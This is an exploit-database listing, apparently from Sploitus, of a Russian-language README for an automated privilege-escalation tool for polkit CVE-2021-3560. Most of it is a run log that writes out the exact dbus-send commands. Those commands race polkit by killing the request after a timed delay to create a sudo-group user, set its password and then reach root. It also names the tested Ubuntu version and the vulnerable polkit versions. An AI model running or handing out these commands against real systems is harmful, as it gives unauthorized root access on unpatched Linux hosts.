Sploitus

polkit-auto-exploit

kitploit · 2026-08-27

Exploit Code

MARKDOWN54 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-AANCW-POLKIT-AUTO-EXPLOIT
# polkit-auto-exploit

Автоматическая эксплойтация PoC для Polkit CVE-2021-3560

# Краткое описание

CVE-2021-3560 — это обход аутентификации в polkit, который позволяет непривилегированному пользователю вызывать привилегированные методы с помощью DBus. В данном эксплойте мы будем вызывать 2 привилегированных метода, предоставляемых accountsservice (CreateUser и SetPassword), что позволяет нам создать привилегированного пользователя, затем установить ему пароль и, в конце, войти под созданным пользователем и повысить привилегии до root. https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/

# Использование

root@kitploit:~
    
    
    ubuntu@ubuntu2004:~/polkit-auto-exploit$ ./polkit-auto-exploit -u adminhs -p admin1 -f admin
    [===] Auto Exploitation PoC for Polkit CVE-2021-3560 by Petruknisme [===]
    [+] Current User: ubuntu
    [+] Variable for Polkit Configuration
    [*] Username : adminhs
    [*] Password : admin1
    [*] Fullname : admin
    [+] Sending create user command to determine time execution
    [*] Execution time: 0.018076ms
    [+] Time to killing dbus-send setting to 0.009038ms
    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:adminhs string:'admin' int32:1 & sleep 0.009038s ; kill $!
    ..................
    [+] GOTCHAAA! User adminhs is created with sudo member group
    [+] Getting UID from user: 1015
    [+] Creating password with OpenSSL
    $5$wwCpZi2.onsiKa6b$B/OovlhfvFWs65EdYnk/1sL.sYSzfPXd1s6ZpurHNr0
    [+] Triggering polkit to create password for adminhs
    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1015 org.freedesktop.Accounts.User.SetPassword string:'$5$wwCpZi2.onsiKa6b$B/OovlhfvFWs65EdYnk/1sL.sYSzfPXd1s6ZpurHNr0' string:admin & sleep 0.009038s ; kill $!
    Failed to execute command: echo admin1 | su -c id adminhs
    uid=1015(adminhs) gid=1015(adminhs) groups=1015(adminhs),27(sudo)
    
    [+] GOTCHAAA! Success login with User adminhs & password: admin1
    [+] You can login to root using su with user and password created before: su -c 'sudo su' adminhs
    

# Протестировано

  * Ubuntu 20.04(policykit-1/focal,now 0.105-26ubuntu1)



# Информация

Любая система, на которой установлена версия polkit 0.113 (или новее), уязвима. Это включает популярные дистрибутивы, такие как RHEL 8 с версией polkit `0.115` и Ubuntu 20.04 с версией polkit `0-105-26` (Debian-форк polkit).

# Уязвимые дистрибутивы

# Лицензия

Лицензия MIT